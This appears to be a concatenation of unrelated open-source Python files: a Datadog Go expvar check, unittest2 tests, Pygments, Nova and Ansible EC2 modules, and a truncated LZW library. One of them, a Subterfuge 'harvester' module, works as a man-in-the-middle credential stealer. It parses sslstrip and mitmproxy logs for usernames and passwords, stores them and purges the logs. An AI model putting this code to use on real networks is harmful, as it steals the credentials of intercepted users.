# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order
import sale_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
ess/dd-agent | checks.d/go_expvar.py | 26 | 7086 | # stdlib
from collections import defaultdict
import re
# 3rd party
import requests
# project
from checks import AgentCheck
DEFAULT_MAX_METRICS = 350
PATH = "path"
ALIAS = "alias"
TYPE = "type"
TAGS = "tags"
GAUGE = "gauge"
RATE = "rate"
DEFAULT_TYPE = GAUGE
SUPPORTED_TYPES = {
GAUGE: AgentCheck.gauge,
RATE: AgentCheck.rate,
}
METRIC_NAMESPACE = "go_expvar"
# See http://golang.org/pkg/runtime/#MemStats
DEFAULT_GAUGE_MEMSTAT_METRICS = [
# General statistics
"Alloc", "TotalAlloc",
# Main allocation heap statistics
"HeapAlloc", "HeapSys", "HeapIdle", "HeapInuse",
"HeapReleased", "HeapObjects",
]
DEFAULT_RATE_MEMSTAT_METRICS = [
# General statistics
"Lookups", "Mallocs", "Frees",
# Garbage collector statistics
"PauseTotalNs", "NumGC",
]
DEFAULT_METRICS = [{PATH: "memstats/%s" % path, TYPE: GAUGE} for path in DEFAULT_GAUGE_MEMSTAT_METRICS] +\
[{PATH: "memstats/%s" % path, TYPE: RATE} for path in DEFAULT_RATE_MEMSTAT_METRICS]
class GoExpvar(AgentCheck):
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_gc_count = defaultdict(int)
def _get_data(self, url):
r = requests.get(url)
r.raise_for_status()
return r.json()
def _load(self, instance):
url = instance.get('expvar_url')
if not url:
raise Exception('GoExpvar instance missing "expvar_url" value.')
tags = instance.get('tags', [])
tags.append("expvar_url:%s" % url)
data = self._get_data(url)
metrics = DEFAULT_METRICS + instance.get("metrics", [])
max_metrics = instance.get("max_returned_metrics", DEFAULT_MAX_METRICS)
return data, tags, metrics, max_metrics, url
def get_gc_collection_histogram(self, data, tags, url):
num_gc = data.get("memstats", {}).get("NumGC")
pause_hist = data.get("memstats", {}).get("PauseNs")
last_gc_count = self._last_gc_count[url]
if last_gc_count == num_gc:
# No GC has run. Do nothing
return
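        # memstats.PauseNs is a circular buffer of the 256 most recent GC pause
        # durations, so slice out only the pauses recorded since the last check.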
start = last_gc_count % 256
end = (num_gc + 255) % 256 + 1
if start < end:
values = pause_hist[start:end]
else:
values = pause_hist[start:] + pause_hist[:end]
self._last_gc_count[url] = num_gc
for value in values:
self.histogram(
self.normalize("memstats.PauseNs", METRIC_NAMESPACE, fix_case=True),
value, tags=tags)
def check(self, instance):
data, tags, metrics, max_metrics, url = self._load(instance)
self.get_gc_collection_histogram(data, tags, url)
self.parse_expvar_data(data, tags, metrics, max_metrics)
def parse_expvar_data(self, data, tags, metrics, max_metrics):
'''
Report all the metrics based on the configuration in instance
If a metric is not well configured or is not present in the payload,
continue processing metrics but log the information to the info page
'''
count = 0
for metric in metrics:
path = metric.get(PATH)
metric_type = metric.get(TYPE, DEFAULT_TYPE)
metric_tags = list(metric.get(TAGS, []))
metric_tags += tags
alias = metric.get(ALIAS)
if not path:
self.warning("Metric %s has no path" % metric)
continue
if metric_type not in SUPPORTED_TYPES:
self.warning("Metric type %s not supported for this check" % metric_type)
continue
keys = path.split("/")
values = self.deep_get(data, keys)
if len(values) == 0:
self.warning("No results matching path %s" % path)
continue
tag_by_path = alias is not None
for traversed_path, value in values:
actual_path = ".".join(traversed_path)
if tag_by_path:
metric_tags.append("path:%s" % actual_path)
metric_name = alias or self.normalize(actual_path, METRIC_NAMESPACE, fix_case=True)
try:
float(value)
except ValueError:
self.log.warning("Unreportable value for path %s: %s" % (path, value))
continue
if count >= max_metrics:
self.warning("Reporting more metrics than the allowed maximum. "
"Please contact [email protected] for more information.")
return
SUPPORTED_TYPES[metric_type](self, metric_name, value, metric_tags)
count += 1
def deep_get(self, content, keys, traversed_path=None):
'''
Allow to retrieve content nested inside a several layers deep dict/list
Examples: -content: {
"key1": {
"key2" : [
{
"name" : "object1",
"value" : 42
},
{
"name" : "object2",
"value" : 72
}
]
}
}
-keys: ["key1", "key2", "1", "value"] would return [(["key1", "key2", "1", "value"], 72)]
-keys: ["key1", "key2", "1", "*"] would return [(["key1", "key2", "1", "value"], 72), (["key1", "key2", "1", "name"], "object2")]
-keys: ["key1", "key2", "*", "value"] would return [(["key1", "key2", "1", "value"], 72), (["key1", "key2", "0", "value"], 42)]
'''
if traversed_path is None:
traversed_path = []
if keys == []:
return [(traversed_path, content)]
key = keys[0]
regex = "".join(["^", key, "$"])
try:
key_rex = re.compile(regex)
except Exception:
self.warning("Cannot compile regex: %s" % regex)
return []
results = []
for new_key, new_content in self.items(content):
if key_rex.match(new_key):
results.extend(self.deep_get(new_content, keys[1:], traversed_path + [str(new_key)]))
return results
def items(self, object):
if isinstance(object, list):
for new_key, new_content in enumerate(object):
yield str(new_key), new_content
elif isinstance(object, dict):
for new_key, new_content in object.iteritems():
yield str(new_key), new_content
else:
self.log.warning("Could not parse this object, check the json"
"served by the expvar")
| bsd-3-clause |
egyp7/Subterfuge | modules/harvester/harvester.py | 4 | 5071 | #!/usr/bin/python
import os
import re
import sys
sys.path.append('/usr/share/subterfuge')
import time
import datetime
import urllib
#Ignore Deprication Warnings
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from django.conf import settings
settings.configure(
DATABASES = {
'default' : {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': "/usr/share/subterfuge/db",
'USER': '',
'PASSWORD': '',
'HOST': '',
}
}
)
from django.db import models
from main.models import credentials
def main():
print "Harvesting Credentials..."
print "Starting FTP Sniffer"
os.system("python /usr/share/subterfuge/modules/harvester/ftp_password_sniffer.py")
#Read in username fields from definitions file
u = open('/usr/share/subterfuge/definitions/usernamefields.lst', 'r')
username = u.readlines()
#Remove all of the new line characters
tmplst = []
for h in username:
tmplst.append(h.rstrip('\n'))
username = tmplst
username.remove('')
#Read in password fields from definitions file
p = open('/usr/share/subterfuge/definitions/passwordfields.lst', 'r')
password = p.readlines()
tmplst2 = []
#Remove all of the new line characters
for g in password:
tmplst2.append(g.rstrip('\n'))
password = tmplst2
password.remove('')
#Purge Logs
os.system("echo > /usr/share/subterfuge/sslstrip.log")
os.system("echo > /usr/share/subterfuge/mitmproxy.log")
os.system("rm /usr/share/subterfuge/harvester.log")
os.system("touch /usr/share/subterfuge/harvester.log")
logswap = 0
log = open("/usr/share/subterfuge/harvester.log")
while 1:
line = log.readline()
if len(line) == 0:
logswap = logswap + 1
#Purge Logs
os.system("echo > /usr/share/subterfuge/harvester.log")
#Consolidate Logs
if logswap % 2 == 0:
os.system("strings -n 10 /usr/share/subterfuge/mitmproxy.log > /usr/share/subterfuge/harvester.log")
os.system("echo > /usr/share/subterfuge/mitmproxy.log")
else:
os.system("cat /usr/share/subterfuge/sslstrip.log > /usr/share/subterfuge/harvester.log")
os.system("echo > /usr/share/subterfuge/sslstrip.log")
time.sleep(5)
user = 'Unknown'
passwd = 'Unknown'
source = 'Unknown'
for i in username:
if (line.find(i) >= 0): #if it is in the string
#parse for host
hoststr = re.findall(r'\(.*?\):', line)
if (len(hoststr) > 0):
host = hoststr[0].partition('(')
hoststr = host[2]
host = hoststr.partition(')')
hoststr = host[0]
source = hoststr
#parse for the username
tmpstr = line.partition(i)
usrpassend = tmpstr[2]
usrs = []
usrs.append(usrpassend)
boolu = 1
while (boolu):
if (usrpassend.find(i) >= 0):
tmpstr = usrpassend.partition(i)
usrpassend = tmpstr[2]
usrs.append(usrpassend)
else:
boolu = 0
newusrs = []
for num in usrs:
usrn = re.findall(r'=(.*?)&', num)
if (len(usrn)):
if (len(usrn[0]) > 2 and len(usrn[0]) < 32 and usrn[0] != 'adtoken'):
#print 'added ' + usrn[0]
newusrs.append(usrn[0])
if (len(newusrs) > 0):
user = newusrs.pop((len(newusrs) -1))
user = urllib.unquote(user)
#print user
#begin password section
for j in password:
if (line.find('&' + j) >= 0): #if it is in the string
#parse for the password
tmpstr2 = line.partition(j)
passend = tmpstr2[2]
passes = []
passes.append(passend)
boolu2 = 1
while (boolu2):
if (passend.find(j) >= 0):
tmpstr2 = passend.partition(j)
passend = tmpstr2[2]
passes.append(passend)
else:
boolu2 = 0
newpasses = []
for num2 in passes:
pas = re.findall(r'=(.*?)&', num2)
if (len(pas)):
if (len(pas[0]) > 2 and len(pas[0]) < 46):
newpasses.append(pas[0])
if (len(newpasses) > 0):
passwd = newpasses.pop((len(newpasses) -1))
passwd = urllib.unquote(passwd)
#print passwd
reap(source, user, passwd)
#to prevent duplicate entries being found
line = ''
else:
newpasses2 = []
for num3 in passes:
pas2 = re.findall(r'=(.*?)\n', num3)
if (len(pas2)):
if (len(pas2[0]) > 2 and len(pas2[0]) < 46):
newpasses2.append(pas2[0])
if (len(newpasses2) > 0):
passwd = newpasses2.pop((len(newpasses2) -1))
passwd = urllib.unquote(passwd)
#print passwd
reap(source, user, passwd)
#to prevent duplicate entries being found
line = ''
#insert into database
def reap(source, username, password):
now = datetime.datetime.now()
date = now.strftime("%d-%m-%Y %H:%M")
logcred = credentials(source = source, username = username, password = password, date = date)
logcred.save()
def usage():
print "\nSubterfuge courtesy of r00t0v3rr1d3 & 0sm0s1z \n"
print "Usage: subterfuge [OPTIONS] \n"
sys.exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 |
rowillia/buck | third-party/py/unittest2/unittest2/test/test_functiontestcase.py | 122 | 5570 | import unittest2
from unittest2.test.support import LoggingResult
class Test_FunctionTestCase(unittest2.TestCase):
# "Return the number of tests represented by the this test object. For
# unittest2.TestCase instances, this will always be 1"
def test_countTestCases(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertEqual(test.countTestCases(), 1)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
raise RuntimeError('raised by setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'addError', 'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
raise RuntimeError('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'addError', 'tearDown',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
self.fail('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'addFailure', 'tearDown',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
raise RuntimeError('raised by tearDown')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertIsInstance(test.id(), basestring)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__no_docstring(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertEqual(test.shortDescription(), None)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__singleline_docstring(self):
desc = "this tests foo"
test = unittest2.FunctionTestCase(lambda: None, description=desc)
self.assertEqual(test.shortDescription(), "this tests foo")
if __name__ == '__main__':
unittest2.main()
| apache-2.0 |
OpenTrons/opentrons-api | api/src/opentrons/calibration_storage/types.py | 2 | 1757 | import typing
from dataclasses import dataclass
from datetime import datetime
from os import PathLike
CalibrationID = typing.NewType('CalibrationID', str)
StrPath = typing.Union[str, PathLike]
AttitudeMatrix = typing.List[typing.List[float]]
PipetteOffset = typing.List[float]
class TipLengthCalNotFound(Exception):
pass
@dataclass
class UriDetails:
namespace: str
load_name: str
version: int
@dataclass
class OffsetData:
"""
Class to categorize the shape of a
given calibration data.
"""
value: typing.List[float]
last_modified: typing.Optional[datetime]
@dataclass
class TipLengthData:
"""
Class to categorize the shape of a
given calibration data.
"""
value: typing.Optional[float] = None
last_modified: typing.Optional[datetime] = None
@dataclass
class ParentOptions:
"""
Class to store whether a labware calibration has
a module, as well the original parent (slot).
As of now, the slot is not saved in association
with labware calibrations.
The slot value will be the empty string.
"""
slot: str
module: str = ''
@dataclass
class CalibrationTypes:
"""
Class to categorize what calibration
data might be stored for a labware.
"""
offset: OffsetData
tip_length: TipLengthData
@dataclass
class CalibrationInformation:
"""
Class to store important calibration
info for labware.
"""
calibration: CalibrationTypes
parent: ParentOptions
labware_id: str
uri: str
@dataclass
class PipetteOffsetCalibration:
"""
Class to store pipette offset calibration
"""
pipette: str
mount: str
offset: PipetteOffset
tiprack: str
uri: str
last_modified: datetime
| apache-2.0 |
sysbot/pastedown | vendor/pygments/pygments/styles/default.py | 26 | 2532 | # -*- coding: utf-8 -*-
"""
pygments.styles.default
~~~~~~~~~~~~~~~~~~~~~~~
The default highlighting style.
:copyright: Copyright 2006-2012 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class DefaultStyle(Style):
"""
The default style (inspired by Emacs 22).
"""
background_color = "#f8f8f8"
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "italic #408080",
Comment.Preproc: "noitalic #BC7A00",
#Keyword: "bold #AA22FF",
Keyword: "bold #008000",
Keyword.Pseudo: "nobold",
Keyword.Type: "nobold #B00040",
Operator: "#666666",
Operator.Word: "bold #AA22FF",
Name.Builtin: "#008000",
Name.Function: "#0000FF",
Name.Class: "bold #0000FF",
Name.Namespace: "bold #0000FF",
Name.Exception: "bold #D2413A",
Name.Variable: "#19177C",
Name.Constant: "#880000",
Name.Label: "#A0A000",
Name.Entity: "bold #999999",
Name.Attribute: "#7D9029",
Name.Tag: "bold #008000",
Name.Decorator: "#AA22FF",
String: "#BA2121",
String.Doc: "italic",
String.Interpol: "bold #BB6688",
String.Escape: "bold #BB6622",
String.Regex: "#BB6688",
#String.Symbol: "#B8860B",
String.Symbol: "#19177C",
String.Other: "#008000",
Number: "#666666",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #000080",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "border:#FF0000"
}
| mit |
zaina/nova | nova/network/opts.py | 51 | 1529 | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import nova.network
import nova.network.driver
import nova.network.floating_ips
import nova.network.ldapdns
import nova.network.linux_net
import nova.network.manager
import nova.network.neutronv2.api
import nova.network.rpcapi
import nova.network.security_group.openstack_driver
def list_opts():
return [
('DEFAULT',
itertools.chain(
nova.network._network_opts,
nova.network.driver.driver_opts,
nova.network.floating_ips.floating_opts,
nova.network.ldapdns.ldap_dns_opts,
nova.network.linux_net.linux_net_opts,
nova.network.manager.network_opts,
nova.network.rpcapi.rpcapi_opts,
nova.network.security_group.openstack_driver.security_group_opts,
)),
('neutron', nova.network.neutronv2.api.neutron_opts),
('upgrade_levels',
itertools.chain(
[nova.network.rpcapi.rpcapi_cap_opt],
)),
]
| apache-2.0 |
petemounce/ansible-modules-extras | cloud/amazon/ec2_eni.py | 10 | 14272 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_eni
short_description: Create and optionally attach an Elastic Network Interface (ENI) to an instance
description:
- Create and optionally attach an Elastic Network Interface (ENI) to an instance. If an ENI ID is provided, an attempt is made to update the existing ENI. By passing 'None' as the instance_id, an ENI can be detached from an instance.
version_added: "2.0"
author: Rob White, wimnat [at] gmail.com, @wimnat
options:
eni_id:
description:
- The ID of the ENI
required: false
default: null
instance_id:
description:
- Instance ID that you wish to attach ENI to. To detach an ENI from an instance, use 'None'.
required: false
default: null
private_ip_address:
description:
- Private IP address.
required: false
default: null
subnet_id:
description:
- ID of subnet in which to create the ENI. Only required when state=present.
required: true
description:
description:
- Optional description of the ENI.
required: false
default: null
security_groups:
description:
- List of security groups associated with the interface. Only used when state=present.
required: false
default: null
state:
description:
- Create or delete ENI.
required: false
default: present
choices: [ 'present', 'absent' ]
device_index:
description:
- The index of the device for the network interface attachment on the instance.
required: false
default: 0
force_detach:
description:
- Force detachment of the interface. This applies either when explicitly detaching the interface by setting instance_id to None or when deleting an interface with state=absent.
required: false
default: no
delete_on_termination:
description:
- Delete the interface when the instance it is attached to is terminated. You can only specify this flag when the interface is being modified, not on creation.
required: false
source_dest_check:
description:
- By default, interfaces perform source/destination checks. NAT instances however need this check to be disabled. You can only specify this flag when the interface is being modified, not on creation.
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Create an ENI. As no security group is defined, ENI will be created in default security group
- ec2_eni:
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
# Create an ENI and attach it to an instance
- ec2_eni:
instance_id: i-xxxxxxx
device_index: 1
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
# Destroy an ENI, detaching it from any instance if necessary
- ec2_eni:
eni_id: eni-xxxxxxx
force_detach: yes
state: absent
# Update an ENI
- ec2_eni:
eni_id: eni-xxxxxxx
description: "My new description"
state: present
# Detach an ENI from an instance
- ec2_eni:
eni_id: eni-xxxxxxx
instance_id: None
state: present
### Delete an interface on termination
# First create the interface
- ec2_eni:
instance_id: i-xxxxxxx
device_index: 1
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
register: eni
# Modify the interface to enable the delete_on_termination flag
- ec2_eni:
eni_id: {{ "eni.interface.id" }}
delete_on_termination: true
'''
import time
import xml.etree.ElementTree as ET
import re
try:
import boto.ec2
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_error_message(xml_string):
root = ET.fromstring(xml_string)
for message in root.findall('.//Message'):
return message.text
def get_eni_info(interface):
interface_info = {'id': interface.id,
'subnet_id': interface.subnet_id,
'vpc_id': interface.vpc_id,
'description': interface.description,
'owner_id': interface.owner_id,
'status': interface.status,
'mac_address': interface.mac_address,
'private_ip_address': interface.private_ip_address,
'source_dest_check': interface.source_dest_check,
'groups': dict((group.id, group.name) for group in interface.groups),
}
if interface.attachment is not None:
interface_info['attachment'] = {'attachment_id': interface.attachment.id,
'instance_id': interface.attachment.instance_id,
'device_index': interface.attachment.device_index,
'status': interface.attachment.status,
'attach_time': interface.attachment.attach_time,
'delete_on_termination': interface.attachment.delete_on_termination,
}
return interface_info
def wait_for_eni(eni, status):
while True:
time.sleep(3)
eni.update()
# If the status is detached we just need attachment to disappear
if eni.attachment is None:
if status == "detached":
break
else:
if status == "attached" and eni.attachment.status == "attached":
break
def create_eni(connection, module):
instance_id = module.params.get("instance_id")
if instance_id == 'None':
instance_id = None
do_detach = True
else:
do_detach = False
device_index = module.params.get("device_index")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
changed = False
try:
eni = compare_eni(connection, module)
if eni is None:
eni = connection.create_network_interface(subnet_id, private_ip_address, description, security_groups)
if instance_id is not None:
try:
eni.attach(instance_id, device_index)
except BotoServerError as ex:
eni.delete()
raise
# Wait to allow creation / attachment to finish
wait_for_eni(eni, "attached")
eni.update()
changed = True
except BotoServerError as e:
module.fail_json(msg=get_error_message(e.args[2]))
module.exit_json(changed=changed, interface=get_eni_info(eni))
def modify_eni(connection, module):
eni_id = module.params.get("eni_id")
instance_id = module.params.get("instance_id")
if instance_id == 'None':
instance_id = None
do_detach = True
else:
do_detach = False
device_index = module.params.get("device_index")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
force_detach = module.params.get("force_detach")
source_dest_check = module.params.get("source_dest_check")
delete_on_termination = module.params.get("delete_on_termination")
changed = False
try:
# Get the eni with the eni_id specified
eni_result_set = connection.get_all_network_interfaces(eni_id)
eni = eni_result_set[0]
if description is not None:
if eni.description != description:
connection.modify_network_interface_attribute(eni.id, "description", description)
changed = True
if security_groups is not None:
if sorted(get_sec_group_list(eni.groups)) != sorted(security_groups):
connection.modify_network_interface_attribute(eni.id, "groupSet", security_groups)
changed = True
if source_dest_check is not None:
if eni.source_dest_check != source_dest_check:
connection.modify_network_interface_attribute(eni.id, "sourceDestCheck", source_dest_check)
changed = True
if delete_on_termination is not None:
if eni.attachment is not None:
if eni.attachment.delete_on_termination is not delete_on_termination:
connection.modify_network_interface_attribute(eni.id, "deleteOnTermination", delete_on_termination, eni.attachment.id)
changed = True
else:
module.fail_json(msg="Can not modify delete_on_termination as the interface is not attached")
if eni.attachment is not None and instance_id is None and do_detach is True:
eni.detach(force_detach)
wait_for_eni(eni, "detached")
changed = True
else:
if instance_id is not None:
eni.attach(instance_id, device_index)
wait_for_eni(eni, "attached")
changed = True
except BotoServerError as e:
print e
module.fail_json(msg=get_error_message(e.args[2]))
eni.update()
module.exit_json(changed=changed, interface=get_eni_info(eni))
def delete_eni(connection, module):
eni_id = module.params.get("eni_id")
force_detach = module.params.get("force_detach")
try:
eni_result_set = connection.get_all_network_interfaces(eni_id)
eni = eni_result_set[0]
if force_detach is True:
if eni.attachment is not None:
eni.detach(force_detach)
# Wait to allow detachment to finish
wait_for_eni(eni, "detached")
eni.update()
eni.delete()
changed = True
else:
eni.delete()
changed = True
module.exit_json(changed=changed)
except BotoServerError as e:
msg = get_error_message(e.args[2])
regex = re.compile('The networkInterface ID \'.*\' does not exist')
if regex.search(msg) is not None:
module.exit_json(changed=False)
else:
module.fail_json(msg=get_error_message(e.args[2]))
def compare_eni(connection, module):
eni_id = module.params.get("eni_id")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
try:
all_eni = connection.get_all_network_interfaces(eni_id)
for eni in all_eni:
remote_security_groups = get_sec_group_list(eni.groups)
if (eni.subnet_id == subnet_id) and (eni.private_ip_address == private_ip_address) and (eni.description == description) and (remote_security_groups == security_groups):
return eni
except BotoServerError as e:
module.fail_json(msg=get_error_message(e.args[2]))
return None
def get_sec_group_list(groups):
# Build list of remote security groups
remote_security_groups = []
for group in groups:
remote_security_groups.append(group.id.encode())
return remote_security_groups
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
eni_id = dict(default=None),
instance_id = dict(default=None),
private_ip_address = dict(),
subnet_id = dict(),
description = dict(),
security_groups = dict(type='list'),
device_index = dict(default=0, type='int'),
state = dict(default='present', choices=['present', 'absent']),
force_detach = dict(default='no', type='bool'),
source_dest_check = dict(default=None, type='bool'),
delete_on_termination = dict(default=None, type='bool')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, StandardError), e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
state = module.params.get("state")
eni_id = module.params.get("eni_id")
if state == 'present':
if eni_id is None:
if module.params.get("subnet_id") is None:
module.fail_json(msg="subnet_id must be specified when state=present")
create_eni(connection, module)
else:
modify_eni(connection, module)
elif state == 'absent':
if eni_id is None:
module.fail_json(msg="eni_id must be specified")
else:
delete_eni(connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
| gpl-3.0 |
hickerson/bbn | fable/fable_sources/libtbx/lzw.py | 1 | 25535 | """
A stream friendly, simple compression library, built around
iterators. See L{compress} and L{decompress} for the easiest way to
get started.
After the TIFF implementation of LZW, as described at
U{http://www.fileformat.info/format/tiff/corion-lzw.htm}
In an even-nuttier-shell, lzw compresses input bytes with integer
codes. Starting with codes 0-255 that code to themselves, and two
control codes, we work our way through a stream of bytes. When we
encounter a pair of codes c1,c2 we add another entry to our code table
with the lowest available code and the value value(c1) + value(c2)[0]
Of course, there are details :)
The Details
===========
Our control codes are
- CLEAR_CODE (codepoint 256). When this code is encountered, we flush
the codebook and start over.
- END_OF_INFO_CODE (codepoint 257). This code is reserved for
encoder/decoders over the integer codepoint stream (like the
mechanical bit that unpacks bits into codepoints)
When dealing with bytes, codes are emitted as variable
length bit strings packed into the stream of bytes.
codepoints are written with varying length
- initially 9 bits
- at 512 entries 10 bits
    - at 1025 entries 11 bits
- at 2048 entries 12 bits
- with max of 4095 entries in a table (including Clear and EOI)
code points are stored with their MSB in the most significant bit
available in the output character.
>>> import lzw
>>>
>>> mybytes = lzw.readbytes("README.txt")
>>> lessbytes = lzw.compress(mybytes)
>>> newbytes = b"".join(lzw.decompress(lessbytes))
>>> oldbytes = b"".join(lzw.readbytes("README.txt"))
>>> oldbytes == newbytes
True
"""
from __future__ import division
__author__ = "Joe Bowers"
__license__ = "MIT License"
__version__ = "0.01.01"
__status__ = "Development"
__email__ = "[email protected]"
__url__ = "http://www.joe-bowers.com/static/lzw"
import struct
import itertools
CLEAR_CODE = 256
END_OF_INFO_CODE = 257
DEFAULT_MIN_BITS = 9
DEFAULT_MAX_BITS = 12
def compress(plaintext_bytes):
"""
Given an iterable of bytes, returns a (hopefully shorter) iterable
of bytes that you can store in a file or pass over the network or
what-have-you, and later use to get back your original bytes with
L{decompress}. This is the best place to start using this module.
"""
encoder = ByteEncoder()
return encoder.encodetobytes(plaintext_bytes)
def decompress(compressed_bytes):
"""
Given an iterable of bytes that were the result of a call to
L{compress}, returns an iterator over the uncompressed bytes.
"""
decoder = ByteDecoder()
return decoder.decodefrombytes(compressed_bytes)
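# A minimal in-memory round trip (illustrative only; the file-based doctest in
# the module docstring above shows the same thing against README.txt):
#
#   compressed = b"".join(compress(b"gabba gabba hey"))
#   assert b"".join(decompress(compressed)) == b"gabba gabba hey"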
class ByteEncoder(object):
"""
Takes a stream of uncompressed bytes and produces a stream of
compressed bytes, usable by L{ByteDecoder}. Combines an L{Encoder}
with a L{BitPacker}.
>>> import lzw
>>>
>>> enc = lzw.ByteEncoder(12)
>>> bigstr = b"gabba gabba yo gabba gabba gabba yo gabba gabba gabba yo gabba gabba gabba yo"
>>> encoding = enc.encodetobytes(bigstr)
>>> encoded = b"".join( b for b in encoding )
>>> encoded
'3\\x98LF#\\x08\\x82\\x05\\x04\\x83\\x1eM\\xf0x\\x1c\\x16\\x1b\\t\\x88C\\xe1q(4"\\x1f\\x17\\x85C#1X\\xec.\\x00'
>>>
>>> dec = lzw.ByteDecoder()
>>> decoding = dec.decodefrombytes(encoded)
